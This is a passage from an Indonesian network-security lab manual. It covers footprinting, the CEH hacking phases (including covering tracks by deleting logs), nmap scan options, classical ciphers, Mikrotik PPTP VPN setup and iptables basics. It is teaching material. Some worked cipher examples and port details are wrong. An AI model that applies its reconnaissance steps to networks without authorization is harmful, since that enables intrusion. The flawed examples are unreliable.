misalnya www.apasaja.co.id, merupakan sumber yang sangat berharga dan mudah untuk mendapatkan informasi mengenai sebuah perusahaan. •



Mendapatkan informasi dari nama domain atau alamat IP Hanya melalui nama domain atau alamat IP dari sebuah perusahaan, hacker bisa mendapatkan banyak informasi darinya.







Netcraft, mendapatkan informasi domain Netcraft.com, adalah sebuah situs yang melakukan me-monitoring terhadap website yang ada di internet.



• Mencari sub domain, email dan informasi lainnya • Survei lokasi • Mengetahui rute perjalanan • Melacak email 2.



Mencari informasi range jaringan yang digunakan Sebuah perusahan besar, biasanya mendapatkan alokasi alamat IP dan ISP. Alamat-alamat IP ini kemudian bisa digunakan oleh beberapa server seperti web server, mail server, remote access server, dan beberapa server lainnya.



3.



Mencari komputer yang aktif



4.



Mencari port yang terbuka dan keberadaan access point



5.



OS Finger printing



6.



Finger printing services



7.



Network mapping



1.3.10 Tahapan aktivitas hacking yang didefinisikan dalam sertifikasi CEH 1.



Reconnaissance Reconnaissance adalah tahap mengumpulkan data dimana hacker akan mengumpulkan semua data sebanyak-banyaknya mengenai target.



2. Scanning Scanning merupakan tanda dari dimulainya sebuah serangan hacker (preattack). Melalui scanning ini, hacker akan mencari berbagai kemungkinan yang bisa digunakan hacker untuk mengambil alih komputer korban.



Keamanan Jaringan | 2018



19



3. Gaining access Melalui sebuah informasi yang didapatkan, hacker akan mulai menyerang komputer



korban



untuk



menyerang



komputer



korban



untuk



menguasainya. 4. Maintaining access Setelah mendapatkan akses ke komputer korban, hacker biasanya ingin tetap menguasai komputer tersebut. 5. Covering tracks Biasanya hacker akan berusaha menutup jejak mereka dengan cara menghapus log file serta menutup semua jejak yang mungkin ditinggalkan.” (S't0, 2009)



1.3.11 Protokol utama dalam jaringan komputer 1. Internet Protocol (IP) Protokol yang mengelola pengalamatan data dari suatu titik ke titik lain, dan fragmen data dari jumlah besar menjadi lebih kecil. 2. Internet Control Message Protocol (ICMP) Protokol yang mengelola kesalahan dan menyediakan pelaporan informasi jaringan IP. 3. Transmission Control Protocol (TCP) Protokol yang digunakan untuk mengirim data yang berorientasi pada koneksi (connection-oriented). Proses pada TCP : • Three way handshake



Gambar 1.7 Proses Handshake



Keamanan Jaringan | 2018



20



Sebelum Host A dan Host B bias berkomunikasi, mereka harus membuat beberapa kesepakatan terlebih dahulu yang dikenal dengan three way handshake. Host A mengirimkan paket synchronize (SYN) flag kepada host B, jika host B bersedia maka host B akan mengirimkan kembali paket (SYN) dan mengirimkan paket Acknowledge (ACK) flag sebagai pesan persetujuan dari host B, kemudian host A mengirim kembali paket (ACK) flag untuk mengkonfirmasi bahwa host A menerima persetujuan dari host B. • TCP sequence Pada proses pengiriman setiap paket data dilakukan secara berurutan. 4. User Datagram Protocol (UDP) Protokol yang memiliki fungsi sama dengan TCP tetapi sifatnya tidak berorientasi pada koneksi (connectionless).



1.3.12 Network Scanning memiliki 4 teknik dasar, yaitu : 1. Network Mapping Proses mengirim pesan kepada host kemudian akan menghasilkan respon jika host tersebut sedang aktif. 2. Port scanning Proses mengirim pesan kepada port tertentu untuk menentukan apakah port tersebut sedang aktif. 3. Service and version detection Mengirim pesan khusus yang dibuat untuk menghasilkan respon sehingga akan menunjukan jenis dan versi layanan yang sedang digunakan. 4. OS detection Mengirim pesan khusus dibuat untuk host aktif untuk menghasilkan respon tertentu yang akan menunjukan sistem operasi yang berjalan pada host.



Berikut beberapa aplikasi yang digunakan untuk melakukan network scanning : 1. Nmap 2. Superscan



Keamanan Jaringan | 2018



21



3. YAPS 4. Angry IP Scanner 5. NEWT Pada modul ini, menggunakan nmap untuk melakukan praktikum network scanning. Nmap singkatan dari Network Mapper adalah sebuah perangkat lunak yang digunakan untuk eksplorasi dan mengaudit keamanan jaringan. Nmap menggunakan paket IP untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi ), sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall / filter paket yang digunakan, dan sejumlah karakteristik lainnya. Aturan penulisan perintah nmap : nmap [ ...] [ ] []



1.4



Langkah – Langkah Praktikum 1.4.1 Setting IP Address Linux Ubuntu Ada 2 cara untuk mengeset IP Addresspada Ubuntu, diantaranya melalui command-line atau terminal, dan mengedit file interface. 1. Terminal Misal kita akan memberikan konfigurasi pada interface eth0 berupa IP address 192.168.10.10 dan netmask 255.255.255.0. Maka perintah yang dijalankan di terminal sebagai berikut : 2. Interface - Masuk ke terminal sebagai superuser - Lalu ketikkan :



-



Setelah interface terbuka, berikan konfigurasi yang kita inginkan :



Keamanan Jaringan | 2018



22



-



Setelah selesai simpan konfigurasi (Ctrl+X  Y  Enter).



-



Restart



3. Repository Repository adalah sekumpulan paket-paket aplikasi atau program untuk sebuah sistem operasi (red : Linux) yang digunakan untuk menunjang kinerja dari sebuah aplikasi, program, dan sebagainya yang didapatkan dari Server Mirror website paket-paket tersebut. Pada dasarnya setiap menginstal software di Linux dibutuhkan repository, maka Linux akan mencari software tersebut di repository. Jika telah ditemukan maka proses instalasi bisa dilanjutkan. Repository di Ubuntu Linux dibagi ke dalam 4 area: 1. Main adalah software yang didukung secara resmi. 2. Restricted adalah software yang didukung tapi tidak seutuhnya free license. 3. Universe adalah Software yang dikelola oleh komunitas 4. Multiverse adalah software yang tidak free Konfigurasi repository berada di /etc/apt/sources.list. File tersebut dirubah sesuai versi ubuntu yang digunakan dan biasanya memilih server local agar lebih cepat.



Keamanan Jaringan | 2018



23



Berikut adalah tahap-tahap konfigurasi repository: 1. Buka terminal di Ubuntu



2. Lalu masuk sebagai super user : # sudo su # password



3. Masuk ke sources list repository : # nano /etc/apt/sources.list



4. Isi



sources.list



untuk



Ubuntu



12.04



dengan



repository



lokal



“kambing.ui.ac.id”



5. Simpan (Ctrl+X  Y  Enter) 6. Kemudian update repository, ketikkan :



Keamanan Jaringan | 2018



24



7. Tunggu hingga proses update repository selesai.



1.4.2 Hal-Hal yang Harus Dilakukan Setelah Instal Ubuntu 1.



Update Ubuntu 12.04 dengan cara buka terminal : # apt-get update



2.



Instal plugin untuk menjalankan aplikasi multimedia : # apt-get install ubuntu-restricted-extras



3.



Install synaptic packet manager dengan cara : # apt-get install synaptic



Paket ini berfungsi sebagai penginstal paket-paket yang dibutuhkan Ubuntu.



1.4.3 Macam-macam teknik scanning yang di lakukan nmap : 1. Discovering host (pencarian host) # sudo nmap Contoh :



Pilihan yang tersedia untuk discovering host Option Description -sL



Print a list of targets and their DNS names



-sP



Perform a ping scan



-sN



Disable host discovery



-PR



Perform an ARP ping



-n



Disable DNS name resolution (also increased scan speed)



Keamanan Jaringan | 2018



25



-R



Enable DNS name resolution on all targets, even non-active targets



2. Port Scanning # sudo nmap –sS Contoh :



Pilihan yang tersedia untuk port scanning Option -sS -sT -sU -sN -sF -sX -sA -sW -sO -F



Port (s) 80 443 53 25 22 23 20 and 21



Description TCP SYN scan TCP connect scan UDP port scan TCP null scan TCP FIN scan TCP Xmas scan TCP Ack scan TCP window scan IP protocol scan Fast scan



Berikut port yang sering ditemukan pada network scanning : Protocol (s) Description TCP Hypertext Transfer Protocol (HTTP) TCP HTTP Secure sockets (HTTPS) UDP and TCP Domain Name Service (DNS) TCP Simple Mail Transport Protocol (SMTP) TCP Secure Shell (SSH) TCP Telnet TCP File Transfer Protocol (FTP)



Keamanan Jaringan | 2018



26



135 -139 and 445



TCP and UDP



500



UDP



5060 123



UDP UDP



Windows File Sharing, login, and Remote Procedure Call (RPC) Internet Security Association and Key Management Protocol (ISAKMP), key negotiation for Secure Internet Protocol (IPSec), virtual private networks (VPNs) Session Initiation Protocol (SIP) for some Voice over IP (VoIP) Network Time Protocol (NTP) for network time synchronization



3. Detections Operating System #s udo nmap –O Contoh :



4. Detecting Service and application version # sudo nmap –sV Contoh :



Keamanan Jaringan | 2018



27



Pilihan yang tersedia untuk port scanning Option -sV -sR



Description Enable version detection for services and applications Enable RPC version detection (enable by default with –sV option)



Keamanan Jaringan | 2018



28



MODUL 2 ENKRIPSI 2.1



Tujuan Praktikum 1. Memahami tentang metode enkripsi. 2. Memahami perbedaan private key dan public key. 3. Mengetahui dan memahami jenis-jenis enkripsi.



2.2



Alat yang digunakan 1. Software Cryptool



2.3



Dasar Teori 2.3.1 Pengertian Enkripsi Enkripsi adalah suatu metode yang digunakan untuk mengkodekan data sedemikian rupa sehingga keamanan informasinya terjaga dan tidak dapat dibaca tanpa di dekripsi (kebalikan dari proses enkripsi) dahulu. Encryption berasal dari bahasa yunani kryptos yang artinya tersembunyi atau rahasia. Enkripsi secara garis besar di bagi menjadi 2 yaitu, steganografi dan kriptografi. Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau meyadari bahwa ada suatu pesan rahasia. Sedangkan kriptografi adalah ilmu yang mempelajari teknik-teknik matematika yang berhubungan dengan aspek keamanan informasi, seperti kerahasiaan data, keabsahan data, integritas data, serta autentikasi data Kekurangan dan kelebihan enkripsi antara lain : • Kelebihan dari Enkripsi 1. Kerahasiaan suatu informasi terjamin 2. Menyediakan autentikasi dan perlindungan integritas pada algoritma checksum/hash 3. Menanggulangi penyadapan telepon dan email 4. Untuk digital signature



Keamanan Jaringan | 2018



29







Kekurangan dari Enkripsi 1. Penyandian rencana teroris 2. Penyembunyian record kriminal oleh seorang penjahat 3. Pesan tidak bisa dibaca bila penerima pesan lupa atau kehilangan kunci



2.3.2 Tujuan Enkripsi Dan tujuan dari enkripsi adalah : 1. Kerahasiaan : Yaitu untuk menjaga isi dari informasi dari siapapun kecuali yang memiliki otoritas atau kunci rahasia untuk membuka informasi yang telah dienkripsi. 2. Integritas data : Untuk menjaga keaslian/keutuhan data, sistem harus memiliki kemampuan untuk mendeteksi manipulasi data oleh pihak-pihak yang tidak berhak, antara lain penyisipan, penghapusan, dan pensubsitusian data lain kedalam data yang sebenarnya. 3. Autentikasi : Ini berhubungan dengan identifikasi/pengenalan, baik secara kesatuan sistem maupun informasi itu sendiri. Dua pihak yang saling berkomunikasi harus saling memperkenalkan diri. Informasi yang dikirimkan melalui kanal harus diautentikasi keaslian, isi datanya, waktu pengiriman, dan lain-lain. 4. Non-repudiasi/Nirpenyangkalan : Adalah usaha untuk mencegah terjadinya penyangkalan terhadap pengiriman/terciptanya suatu informasi oleh yang mengirimkan/membuat. Cara kerja dari algoritma ini adalah dengan menggantikan setiap karakter dari plaintext dengan karakter lain.



2.3.3 Jenis – Jenis Enkripsi Enkripsi di bagi menjadi 2 jenis, yaitu : 1. Simetris Simetris adalah enkripsi yang paling sederhana yang hanya melibatkan satu kunci rahasia untuk menyandikan dan menguraikan informasi. Enkripsi simetris merupakan teknik lama dan paling terkenal. Metode ini menggunakan kunci rahasia yang bisa berupa angka, kata atau string huruf acak. Ini adalah



Keamanan Jaringan | 2018



30



gabungan plain text (teks polos) yang dipadukan dengan sebuah konten dengan cara tertentu. Pengirim dan penerima harus mengetahui kunci rahasia yang digunakan untuk mengenkripsi dan mendekripsi semua pesan. Kelemahan enkripsi simetris ini bahwa semua pihak yang terlibat harus menukar kunci yang digunakan untuk mengenkripsi data sebelum mereka dapat mendekripsinya



Gambar 2.1 Enkripsi Simetris



Adapun contoh dari enkripsi asimetris, yaitu : • Caesar cipher Caesar cipher adalah algoritma cipher substitusi yang menggunakan konsep pergeseran huruf dengan modulo 26. • Substitusi cipher Cipher Substitusi adalah cipher dengan cara mensubstitusi huruf dengan huruf yang lain sesuai dengan yang ditetapkan. Prinsip utama cipher substitusi adalah menukarkan setiap huruf pada plainteks dengan sesuatu. Cipher substitusi termasuk algoritma kriptografi klasik. • Vigenere Vigenere chiper merupakan salah satu algoritma kriptografi klasik untuk menyandikan suatu plaintext dengan menggunakan teknik substitusi. Vigenere cipher pada dasarnya cukup rumit untuk dipecahkan. Meskipun begitu, Vigenere cipher tetap memiliki kelemahan. Salah satunya adalah dapat diketahui panjang kuncinya dengan menggunakan metode kasiski. Hal



Keamanan Jaringan | 2018



31



ini disebabkan karena umumnya terdapat frasa yang berulang-ulang pada ciphertext yang dihasilkan. Contoh penyelesaian vigenere chiper sederhana: Plainteks



: azizul hakim prabowo



Key



: inform atika informa



Maka, akan di dapat kan chiperteks : imnokx atssm xefpfio



• DES DES (Data Encryption Standard) merupakan salah satu algoritma kriptografi cipher block dengan ukuran blok 64 bit dan ukuran kuncinya 56 bit. Algoritma DES dibuat di IBM, dan merupakan modifikasi daripada algoritma terdahulu yang bernama Lucifer. Lucifer merupakan algoritma cipher block yang beroperasi pada blok masukan 64 bit dan kuncinya berukuran 28 bit. Pengurangan jumlah bit kunci pada DES dilakukan dengan alasan agar mekanisme algoritma ini bisa diimplementasikan dalam satu chip. 2. Asimetris Enkripsi asimetris juga dikenal sebagai kriptografi menggunakan kunci publik (public-key), yang merupakan pengembangan dari metode enkripsi simetris dan lebih menjamin keamanan. Enkripsi asimetris menggunakan dua kunci yaitu kunci publik (public key) dan kunci pribadi (private key). Kunci publik tersedia secara bebas bagi siapa saja yang mungkin ingin mengirimkan pesan kepada Anda, namun Kunci pribadi (kunci kedua) dirahasiakan sehingga hanya Anda yang mengetahuinya. Pesan yang dienkripsi menggunakan kunci publik hanya dapat didekripsi dengan menggunakan kunci pribadi, sementara pesan yang dienkripsi menggunakan kunci pribadi dapat didekripsi dengan menggunakan kunci publik. Keamanan kunci publik tidak diperlukan karena tersedia untuk umum dan bisa ditransmisikan melalui internet. Kunci asimetris memiliki kekuatan yang jauh lebih baik dalam menjamin keamanan informasi yang ditransmisikan selama komunikasi berlangsung. Contoh algoritma terkenal yang menggunakan kunci



Keamanan Jaringan | 2018



32



asimetris adalah RSA (Riverst Shamir Adleman) dan ECC (Elliptic Curve Cryptography).



Gambar 2.2 Enkripsi Asimetris



2.4



Langkah – Langkah Praktikum 1. Buka software CrypTool



2. Pada menu Templets pilih cryptography caesar cipher.



3. Setalah halaman workplace terbuka, masukkan plaintext “praktikum kamjar” dan pergeseran huruf pada caesar “3”. Lalu running untuk mendapatkan ciphertext.



Keamanan Jaringan | 2018



33



di peroleh : - Plaintext - Ciphertext



: praktikum kamjar : zbkudsuew ukwtkb



Keamanan Jaringan | 2018



34



MODUL 3 UJI KOMPETENSI PRAKTIKUM 1 - KEAMANAN JARINGAN 3.1



Pengenalan Linux Ubuntu 1. Buat Host Baru 2. Buat Folder Baru 3. Buat File 4. Copy Folder 5. Cut/Move Folder dan File 6. Konfigurasi IP address



3.2



Scanning and Footprinting 1. Mencari Host Yang aktif 2. Mencari OS yang digunakan 3. Mencari Service yang digunakan 4. Scan Network lalu simpan dalam .txt



3.3



Enkripsi 1. Mencari ciphertext dengan metode caesar, substitusi dan vigenere. 2. Mencari plaintext dari ciphertext dan key yang ada.



Keamanan Jaringan | 2018



35



MODUL 4 UJI KOMPETENSI TEORI 1 - KEAMANAN JARINGAN 4.1



Pendahuluan Keamanan Jaringan 1. Confidentialy 2. Authentication 3. Data Integrity 4. Availability 5. Access Control 6. Non Repudiation



4.2



Etika Hacking 1. Perkembangan cyberspace 2. Real space vs cyber space 3. Cyber ethic 4. Ethical hacking



4.3



Dasar Keamanan Jaringan 1. Jenis Serangan : Interupsi, Interception, Modifikasi, Fabrikasi, Denial of service Attack 2. Instrusion Detection and Prevention System, Ruled Base Detection, Anomaly Detection



4.4



Pengenalan Sistem Operasi Open Source 1. Basic command 2. Management file 3. Sistem repository 4. Dual boot system 5. Hirarki system linux



Keamanan Jaringan | 2018



36



4.5



Footprinting dan Scanning 1. Who is lookup 2. DNS footprinting 3. Trace route analysis 4. Spiderfoot 5. Web data extractor 6. Portscan 7. Port printing



4.6



Enkripsi 1. Metode – metode enkripsi (simetris dan asimetris) 2. Vigenere cipher 3. Caesar cipher 4. Substitusi chipper 5. DES



Keamanan Jaringan | 2018



37



MODUL 5 VIRTUAL PRIVATE NETWORK (VPN) 5.1



Tujuan Praktikum 1. Memahami tentang Virtual Private Network 2. Mengetahui instalasi dan konfigurasi VPN 3. Mampu membuat sebuah server VPN



5.2



Alat yang digunakan 1. Router Miktrotik 2. Laptop dengan OS Windows 3. Vmware dengan OS Ubuntu dan Mikrotik 4. Winbox v22.16 5. Wireshark Version 1.10.7



5.3



Dasar Teori 5.3.1 Jenis Implementasi VPN Pada implementasinya terdapat dua jenis VPN, yaitu Remote Access VPN dan Site to Site VPN. • Remote Access VPN Remote access VPN disebut juga Virtual Dial-up Network (VPDN). VPDN adalah jenis user-to-LAN connection, koneksi yang menghubungkan pengguna yang mobile dengan Local Area Network (LAN). Ini artinya, user dapat mengakses ke private network dari manapun. Biasanya VPDN ini dimanfaatkan oleh para pegawai yang sedang berada di luar kantor dan memerlukan koneksi ke jaringan kantor perusahaanya. Biasanya perusahaan yang ingin membuat jaringan VPN tipe ini akan bekerja sama dengan Enterprise Service Provider (ESP). ESP akan memberikan suatu Network Access Server (NAS) bagi perusahaan tersebut. ESP juga akan memberikan software khusus untuk komputer-komputer yang digunakan oleh pegawai perusahaan tersebut.



Keamanan Jaringan | 2018



38



Gambar 5.1 Remote Access VPN Untuk mengakses jaringan lokal perusahaan, pegawai terlebih dahulu terhubung ke NAS dengan men-dial nomor telepon yang sudah ditentukan. Kemudian dengan menggunakan software client pegawai tersebut dapat terhubung ke jaringan lokal perusahaan.







Site-to-site VPN Site-to-site VPN digunakan untuk menghubungkan berbagai area yang sudah fixed atau tetap, VPN ini memanfaatkan perangkat dedicated yang dihubungkan melalui internet. Contoh implementasi VPN jenis ini adalah digunakan untuk menghubungkan antara dua kantor atau lebih yang letaknya berjauhan. Koneksi anatara kantor tersebut secara terus menerus 24 jam. Site-to-site VPN dibagi menjadi dua, yaitu extranet dan intranet. Intranet yaitu dimana VPN hanya digunakan untuk menghubungkan berbagai lokasi yang masih satu instansi atau satu perusahaan. Seperti kantor pusat dihubungkan dengan kantor cabang. Dengan kata lain, administrative control dalam satu kendali. Sedangkan extranet adalah dimana saat VPN digunakan untuk menghubungkan perusahaan satu dengan perusahaan yang lain, misalnya mitra kerja, supplier, atau pelanggan. Dengan kata lain administrative control berada di bawah kendali beberapa instansi terkait.



Keamanan Jaringan | 2018



39



Gambar 5.2 Intranet VPN



Gambar 5.3 Extranet VPN 5.3.2 Protocol VPN • PPTP PPTP (Point-to-Point Tuneling Protocol) merupakan protokol jaringan yang memungkinkan pengamanan transfer data dari remote client ke server pribadi perusahaan dengan membuat sebuah VPN melalui TCP/IP. Teknologi jaringan PPTP merupakan pengembangan remote dari remote access Pointto-Point protocol yang dikeluarkan oleh Internet Engineering Task Force (IETF).



PPTP



merupakan



paket PPP menjadi IP internet. PPTP juga



protokol



datagrams agar dapat



digunakan



jaringan



dapat pada



yang



merubah



ditransmisikan



melalui



jaringan private LAN-to-



LAN. Fasilitas utama dari penggunaan PPTP adalah dapat digunakannya public-switched



telephone network (PSTNs)



untuk



membangun



VPN.



Pembangunan PPTP yang mudah dan berbiaya murah untuk digunakan secara luas, menjadi solusi untuk remote users dan mobile users



Keamanan Jaringan | 2018



40



karena PPTP memberikan keamanan dan enkripsi komunikasi melalui PSTN ataupun internet. • L2TP L2TP (Layer 2 Tunnel Protocol) merupakan pengembangan dari PPTP ditambah L2F. Network security Protocol dan enkripsi yang digunakan untuk autentikasi sama dengan PPTP. Akan tetapi untuk melakukan komunikasi, L2TP menggunakan UDP port 1701. Biasanya untuk keamaanan yang lebih baik, L2TP dikombinasikan dengan IPSec, menjadi L2TP/IPSec. L2TP biasa digunakan dalam membuat Virtual Private Network (VPDN) yang dapat bekerja membawa semua jenis protokol komunikasi didalamnya. Umumnya L2TP menggunakan port 1702 dengan protocol UDP untuk mengirimkan L2TP encapsulated PPP frames sebagai data yang di tunnel. Terdapat dua model tunnel yang dikenal, yaitu compulsory dan voluntary. Perbedaan utama keduanya terletak pada end point tunnel-nya. Pada compulsaty tunnel, ujung berada pada ISP, sedangkan pada voluntary ujung tunnel berada pada client remote. • IPSec IPsec merupakan tunneling protocol yang bekerja pada layer 3. IPSec menyediakan layanan sekuritas pada IP layer dengan mengizinkan sistem untuk memilih protokol keamanan yang diperlukan, memperkirakan algoritma apa yang akan digunakan pada layanan, dan menempatkan kunci kriptografi yang diperlukan untuk menyediakan layanan yang diminta. IPSec menyediakan layanan-layanan keamanan tersebut dengan menggunakan sebuah metode pengamanan yang bernama Internet Key Exchange (IKE). IKE bertugas untuk menangani protokol yang bernegosiasi dan algoritma pengamanan yang diciptakan berdasarkan dari policy yang diterapkan. Dan pada akhirnya IKE akan menghasilkan sebuah sistem enkripsi dan kunci pengamanannya yang akan digunakan untuk otentikasi yang digunakan pada sistem IPSec ini.



Keamanan Jaringan | 2018



41



• OpenVPN OpenVPN merupakan aplikasi open source untuk Virtual Private Networking (VPN), dimana aplikasi tersebut dapat membuat koneksi pointto-point tunnel yang telah terenkripsi. OpenVPN menggunakan private keys, certificate, atau username/password untuk melakukan authentikasi dalam membangun koneksi. Dimana teknologi yang digunakan untuk enkripsi dalam jaringan OpenVPN ini menggunakan teknologi SSL dan untuk komunikasinya OpenVPN bergerak di Layer 2 dan 3 OSI Layer. Karena OpenVPN berbasis protocol SSL maka OpenVPN ini dapat digunakan di berbagai sistem operasi tanpa perbedaan yang signifikan.



5.3.3 Cara Kerja VPN VPN merupakan koneksi virtual yang bersifat privat, maksud dari virtual sendiri adalah VPN menciptakan tunel atau terowongan virtual dalam jaringan publik yang tidak harus direct dengan menggunakan protocol-protocol seperti PPTP, L2TP, atau IPSec. Sedangkan privat maksudnya adalah data yang dikirimkan melalui tunel tersebut terenkripsi (terbungkus), sehingga tetap rahasia meskipun melewati public network. Dalam VPN terdapat VPN Server dan VPN Client, semua koneksi diatur oleh VPN Server. Pertama-tama VPN Server harus dikonfigurasikan terlebih dahulu, kemudian di client harus diinstal program VPN baru setelah itu bisa dikoneksikan. Di Client nantinya akan muncul koneksi virtual, jadi dalam client akan muncul network adapter (LAN Card) tetapi virtual. Tugas VPN Client adalah untuk mengenkripsi/dekripsi dan autentikasi.



Keamanan Jaringan | 2018



42



Gambar 5.4 Sistem VPN Contoh implementasinya, seorang client yang telah terhubung VPN akan mengakses suatu situs www.google.com. Request ini sebelum tersampaikan ke VPN Server terlebih dahulu dienkripsikan oleh VPN Client, misal dienkripsi dengan rumus A, karena sebelumnya telah dikonfigurasikan antara VPN server dan client maka server dan client akan mempunyai algoritma yang sama untuk membaca sebuah enkripsi. Begitu juga sebaliknya server ke client.



5.4



Prosedur Praktikum 5.4.1 Konfigurasi VPN Pada Router Mikrotik (PPTP)



Gambar 5.5 Topologi PPTP



Keamanan Jaringan | 2018



43



1.



Buka winbox dan connect ke mikrotik



2.



Setting IP mikrotik reset konfigurasi mikrotik, mikrotik akan restart dan koneksikan kembali melalui winbox. # system reset-configuration no-defaults=yes



3.



Setting IP mikrotik, isi ip address sesuai dengan topologi dan setting interface yang ingin di set ip # ip address add address=[ip address/network] interface=[interface yang disetting]



Keamanan Jaringan | 2018



44



4.



Buka terminal (ctrl+alt+t), masuk ke super user dan telnet mikrotik dengan perintah # telnet (IP_mikrotik)



5.



Masukan username dan password mikrotik, untuk default login mikrotik memiliki username admin dan password kosong.



6.



Ini adalah tampilan awal ketika berhasil login mikrotik



7.



Setting wireless mikrotik, wireless digunakan sebagai interface yang untuk VPN client agar dapat tersambung kejaringan VPN.



8.



Setting IP interface Wlan1



9.



Setting SSID, ssid merupakan nama dari wireless yang akan tampil pada client



10. Setting dhcp server, jadi ketika client konek ke wireless tidak perlu setting ip



client akan otomati mendapatkan broadcast ip address dari mikrotik. Pertama setting pool address. # ip pool add name=[nama_pool] ranges=[range ip yang akan diberikan ke client]



Keamanan Jaringan | 2018



45



11. Setting interface yang akan dijadikan gateway ip dhcp server, src-address merupakan alamat ip dari wlan1 yang akan menjadi gateway client. Kemudian enable ip dhcp server yang telah kita buat



12. Setting network yang akan menjadi network dari jaringan antar client



13. Setelah setting interface selesai, coba konekkan client ke ssid yang telah dibuat dan tes ping antar client, jikan konfigurasi benar harusnya antar client dapat saling ping. 14. Langkah pembuatan VPN, buat default profile VPN, ini adalah profile yang akan digunakan untuk jaringan VPN yang akan dibuat. Local-address merupakan ip address pada interface mikrotik sebagai gateway yang terhubung dengan client. Remote-address adalah IP address yang akan di berikan ke VPN client. # ppp profile add name=(nama profile) local-address=(ip interface mikrotik) useencryption=yes



15. Aktifkan fungsi PPTP Server, secara default server pptp pada mikrotik masih belum aktif, untuk mengaktifkan fungsi server PPTP agar mikrotik dapat berfungsi sebagai server VPN dapat menggunakan comment. # interface pptp-server set enable=yes default-profile=(nama profile pptp)



16. Daftarkan id user VPN, langkah ini akan mendaftarkan user yang dapat terhubung kejaringan VPN, buatlah nama user dan password user yang akan digunakan user untuk connect ke jaringan VPN, input profile dengan profile pptp yang telah dibuat sebelumya, dan input service dengan pptp untuk membuat client pptp



Keamanan Jaringan | 2018



46



17. Langkah pembuatan PPTP Server selesai sekarang untuk membuktikan bahwa server VPN yang dibuat telah berhasil, kita buat VPN client pada ubuntu dengan cara klik VPN connection  Configure VPN



18. Pada menu VPN pilih add



19. Pilih jenis VPN yang digunakan yaitu PPTP  klik Create



20. Buat profile VPN client, setting sebagai berikut : Connection name : VPN-kemjar (buat nama profile vpn) Gateway : 10.11.226.10 (IP interface mikrotik) Username : cnc (username pada VPN server) Password : cnc (password pada VPN server)



Keamanan Jaringan | 2018



47



21. Koneksikan VPN yang telah dibuat.



22. Cek IP VPN jika berhasil maka client akan mendapatkan dengan ip sesuai dengan yang telah di setting di awal, buka terminal dan ketik perintah. # ifconfig pp0



Keamanan Jaringan | 2018



48



23. Setting VPN client pada windows 7 dan 8, masuk ke menu network and



sharing center dan pilih menu set up a new connection or network.



24. Pilih menu connect to a worksplace.



25. Pilih Use my internet connection (VPN)



26. Pilih I”ll set up an internet connection later.



Keamanan Jaringan | 2018



49



27. Masukkan internet address dengan ip gateway wireless pada mikrotik.



28. Masukan username dan password VPN.



29. Masuk ke menu adapter setting dan properties pada VPN yang kita create, dan pilih type VPN dengan PPTP.



Keamanan Jaringan | 2018



50



5.4.2 Pengujian Jaringan VPN Pada praktikum kali ini akan dilakukan pengujian jaringan VPN dengan software wireshark pada salah satu VPN client yang telah tersambung kejaringan VPN, dengan langkah sebagai berikut : 1.



Open wireshark dan pilih capture interfaces



2.



Pilih interface yang akan di capture dan click start



Keamanan Jaringan | 2018



51



3.



Jika jaringan VPN berhasil maka akan tampil package protokol ppp yang telah di encapsulasi



5.4.3 Konfigurasi VPN Pada Mikrotik VMware (PPTP) 1.



Buka mikotik pada VMware, lalu akan muncul tampilan login pada mikrotik.



2.



Isikan “admin” pada mikrotik login dan kosongkan password, lalu akan muncul tampilan awal mikrotik



3.



Setting IP mikrotik,, isi ip address sesuai dengan topologi dan setting interface yang ingin di set ip # ip address add address=[ip address/network] interface=[interface yang disetting]



4.



Untuk menampilkan IP yang sudah di setting pada mikrotik



Keamanan Jaringan | 2018



52



5.



Ubah setting adapter menjadi Custom Specific Virtual Network VMnet1(Host-only) pada Mikrotik



6.



Buka Network and Sharing Center pada Windows lalu ubah IP pada VMnet1 dan buat menjadi 1 jaringan



7.



Lakukan test ping antara Mikrotik dengan Windows



8. Setting Profile VPN pada mikrotik # ppp profile add name=[Nama VPN yang ingin dibuat] local-address=[IP address] use-encryption=yes



9.



Buat akun dan password untuk VPN # ppp secret add name=[Nama] password=[password] local-address=[IP address] remote-address=[ IP address]



Keamanan Jaringan | 2018



53



10. Aktifkan PPTP Server # interface pptp-server server set enabled=yes default-profile=[Nama VPN]



11. Mengkonfigurasi DHCP Server # ip dhcp-server setup



5.4.4 Menghubungkan Windows Dengan VPN Pada Mikrotik 1.



Buka Network and Sharing Center, dan pilih set up a new connection or network



2.



Pilih connect to a workplace



3.



Pilih Use my internet connection (VPN) , setelah itu next



Keamanan Jaringan | 2018



54



4.



Isi Internet address dan Destination name menggunakan IP pada mikrotik dan profil VPN yang telah dibuat, lalu create.



5.



Jika berhasil maka akan ada VPN yang kita buat di Network Connection, dan connect ke VPN dengan menggunkan akun dan password yang telah dibuat



6.



Jika berhasil maka connection akan connected pada VPN



Keamanan Jaringan | 2018



55



MODUL 6 FIREWALL AND ACCESS LIST 6.1



Tujuan Praktikum 1. Mengetahui pengertian Firewall 2. Mengetahui penggunaan sintaks-sintaks pada Iptables 3. Dapat mengimplentasikan Access List pada server Ubuntu



6.2



Aplikasi yang Digunakan 1. Linux Ubuntu 12.04 2. Iptables 3. Cisco Packet Tracer



6.3



Dasar Teori 6.3.1 Firewall Firewall adalah sebuah sistem perangkat lunak yang dirancang untuk mengizinkan lalu lintas jaringan yang dianggap aman dan mencegah lalu lintas yang dianggap tidak aman. Firewall berjalan di Gateway antara jaringan lokal dengan jaringan internet.



Gambar 6.1 Ilustrasi Firewall



6.3.2 Access List Access List adalah sebuah list (daftar) yang berisi informasi tentang siapa saja yang diperbolehkan memasuki sebuah jaringan dan yang dilarang. Access List dikonfigurasikan dengan menggunakan Firewall dan Proxy. Keamanan Jaringan | 2018



56



6.3.3 Iptables Iptables adalah sebuah tool dalam sistem operasi Linux yang berfungsi untuk mem-filter lalu lintas data. Secara sederhana digambarkan sebagai pengatur lalu lintas data. Dengan iptables inilah kita akan mengatur semua lalu lintas dalam komputer, baik yang masuk ke komputer, keluar dari komputer, ataupun lalu lintas yang sekedar melewati komputer kita. Iptables dapat memperbolehkan administrator sistem untuk mengkonfigurasi tabel-tabel yang disediakan oleh Firewall. Macam-macam tabel dalam Iptables yakni : • Filter : Tabel default yang ada dalam penggunaan Iptables • NAT : Tabel ini digunakan untuk fungsi NAT, redirect, redirect port • Mangle : Tabel ini berfungsi sebagai penghalus proses pengaturan paket



